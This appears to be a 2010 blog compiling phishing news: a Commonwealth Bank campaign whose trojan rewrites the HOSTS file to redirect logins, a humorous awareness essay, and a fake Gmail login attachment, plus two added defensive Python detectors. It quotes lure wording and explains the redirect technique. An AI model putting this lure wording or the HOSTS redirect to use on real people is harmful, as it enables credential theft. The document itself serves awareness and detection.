20 September 2010

Commonwealth Bank #Phishing #Australia

September 17th, 2010, 19:54 GMT| By Lucian Constantin

Security researchers from Sophos warn of an unusual phishing attack targeting Commonwealth Bank customers, which makes use of a DNS hijacking trojan to steal login details.

The attack starts with spam emails abusing a real Commonwealth Bank email template, which includes the organization's logo, copyright notice and other identification elements.

The rogue messages come with a subject of “Update your Commonwealth Bank” and read: "This e-mail is to inform you that your account will be suspended within 48 hours due to your Account Inactivity."

The recipients are told that they need to confirm certain information associated with their account in order to continue using it.

A "Verify My Account Information" link is included in the email, but surprisingly, it doesn't lead to a phishing website.

Instead, it points to a file called CommBank.scr hosted on an external .cx (Christmas Island) domain which, if run, installs a trojan on the victim's computer.

This malware's primary purpose is to phish credentials from users, and it achieves this through two files dropped in the \drivers\etc folder.

One is called pic.url and leads to a Commonwealth Bank phishing page. The other is a replacement HOSTS file containing rogue entries for the bank's domains.

Because the operating system consults the HOSTS file before querying DNS, all requests for commbank.com or commbank.com.au made from an infected computer are silently redirected to a phishing website that mimics the bank's login system, even when the user types the correct address.

Ironically, the trojan installer is also infected with a virus called Sality, suggesting that the computer of whoever is behind the phishing attack is affected by this threat.

"[…] It's unlikely this is a deliberate measure, as we've seen uninfected variants of this phishing Trojan in the past (which we detect as Mal/RarHosts-A), and anyway the Sality doesn't so much hide the Trojan as paint it in bright colours, making it even easier to spot and to block," explained Richard Cohen, a malware researcher at Sophos.
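Because the redirect described above lives in the local HOSTS file rather than in DNS, a defender can catch it by reading that file directly. The following is an added example (not code from the article or from Sophos) that parses hosts-file text and flags any entry pinning the bank domains named above to a non-loopback address; the sample file contents and the 203.0.113.45 address are constructed.

```python
import ipaddress

# Domains the article says the trojan's HOSTS file hijacks (watch list is an assumption).
WATCHED_DOMAINS = {"commbank.com", "commbank.com.au"}

# Constructed sample: the stock localhost lines plus injected bank entries.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.45    commbank.com www.commbank.com
203.0.113.45    commbank.com.au   # injected by the trojan
"""


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text, ignoring comments and junk."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue                           # malformed line: skip, don't crash
        for name in names:
            entries.append((ip, name.lower().rstrip(".")))
    return entries


def is_watched(name):
    """True for a watched domain or any subdomain of it."""
    return any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS)


def find_hijacks(text):
    """Entries that send a watched domain anywhere other than loopback."""
    return [(ip, name) for ip, name in parse_hosts(text)
            if is_watched(name) and not ipaddress.ip_address(ip).is_loopback]


if __name__ == "__main__":
    for ip, name in find_hijacks(SAMPLE_HOSTS):
        print(f"suspicious HOSTS entry: {name} -> {ip}")
```

On Windows the file to read is %SystemRoot%\System32\drivers\etc\hosts; on Unix-like systems it is /etc/hosts.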


09 September 2010

Gone #Phishing and you're the fish!

Believe it or not, there are rascals inhabiting this very planet; their consequence emanates from under the woodwork everywhere and arrives without warning at your inbox.

These communiqués, in the form of emails, are simply the result of people who have gone "phishing," not to be confused with the term "gone fishing," a practice no one seems to object to except maybe the fish. Still, these rogues are after a fish, and the fish, my friend, is you!

Phishing employs both technical schemes and reliance on your lack of caution to gain your personal identity and financial information.

The way they hook their victim is through a cloaked link (the bait) leading their unsuspecting fish, that's you, to a counterfeit website carefully designed to trick their catch (you) into divulging private financial data such as credit card numbers, usernames, passwords, social security numbers, and so forth.

These traps are intermingled with everyday spam, or whatever passes as spam, littering your inbox. In reality, ordinary spam is merely bothersome at worst, requiring its disposal through excessive use of the delete key, yet phishing can be far more destructive.

These deceptive ploys fraught with harmful intentions appear daily in mail boxes everywhere, arriving from outside and inside the country, highlighting the Internet's lack of policing and our peril.

An email message can be a useful and handy tool, yet it's tailor-made for this type of villain. The reminder you receive can appear as a genuine concern from a business you are doing commerce with and have already entrusted with your personal information.

The subject line of these bogus emails reads something like, "We suspect an unauthorized transaction on your account," then sets the hook by declaring only "good intentions," stating, "To ensure your account is not compromised, please click the link below and confirm your identity."

Or, the phony email might assert that, "During our regular verification of accounts we couldn't verify your information." This phrase is calculated to put you into a panic; then comes the bait: "Please click here to update and verify your information." And, if you do, they win!

And yes, I am not too proud to admit a close friend of mine, in his newbie days, fell prey to this blatant deception. Come to think of it, his name and description are curiously the same as mine. Oh well, I know it couldn't have been me, as I wouldn't fall for such a ruse. Then again!

Following this incident, I have developed a simple rule: I never respond through any email allegedly from anyone I'm doing business with, regardless of my lack of suspicion. Where I feel it's of proper concern, I go directly through my browser to the site, enter and check it out.

This advice I offer you like a brother: never react directly to any message that poses a serious concern and provides a "convenient" link for you to deposit your critical information. It could be the most costly mistake of your life.

While there are sites where you can forward these poison pills, your only real protection is you. Don't rely on any company, notwithstanding their plausible concerns, for in the end you retain the power of the delete button; use it wisely.

By the bye, phishing is often referred to as "spoofing," what a harmless expression. As if, "sure I stole your identity, cleaned out your bank account, left you with huge financial losses to overcome, but hey, I was only spoofing!"


Gmail #phishing campaign is under way

Fake notices inviting Gmail users to update their Google account information have lately been hitting inboxes around the world, warns Sunbelt.

Purportedly coming from the "Google Team", the rather legitimate-looking message tries to get users to download and open the attached Gmail_access.html file, which, when opened in a browser, presents a very realistic but fake version of the Gmail login page.

If it looks realistic, it is because it loads certain graphic elements from the legitimate Gmail page, but a peek at the source code reveals that the entered information gets sent to a script hosted on a domain registered in Serbia. Because the HTML is opened from a local file rather than from google.com, the browser's address bar offers no clue; the form's action attribute is the tell.
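The "peek at the source code" above can be automated: extract every form action from the attachment and flag any that does not post to an expected Google host. The following is an added example (not code from the article or from Sunbelt); the sample HTML, the data-collector.example domain and the EXPECTED_HOSTS list are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the Gmail_access.html attachment: images come from
# Google's servers, but the credentials are posted to an unrelated domain.
SAMPLE_HTML = """
<html><body>
<img src="https://mail.google.com/mail/images/logo.png">
<form method="post" action="http://data-collector.example/collect.php">
  <input name="Email"><input name="Passwd" type="password">
</form>
</body></html>
"""

# Hosts a genuine Gmail login form would post to (assumption for this example).
EXPECTED_HOSTS = {"accounts.google.com", "www.google.com"}


class FormCollector(HTMLParser):
    """Collect the action attribute of every <form> in the document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_targets(html):
    parser = FormCollector()
    parser.feed(html)
    return parser.actions


def foreign_form_actions(html, expected_hosts=EXPECTED_HOSTS):
    """Form actions whose host is not an expected one.

    An empty or relative action is also flagged: from a file:// page it would
    post somewhere on the local disk, which no real login form does.
    """
    suspicious = []
    for action in form_targets(html):
        host = (urlparse(action).hostname or "").lower()
        if host not in expected_hosts:
            suspicious.append(action)
    return suspicious


if __name__ == "__main__":
    for action in foreign_form_actions(SAMPLE_HTML):
        print(f"credentials would be posted to: {action}")
```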

Source: http://www.net-security.org/secworld.php?id=9842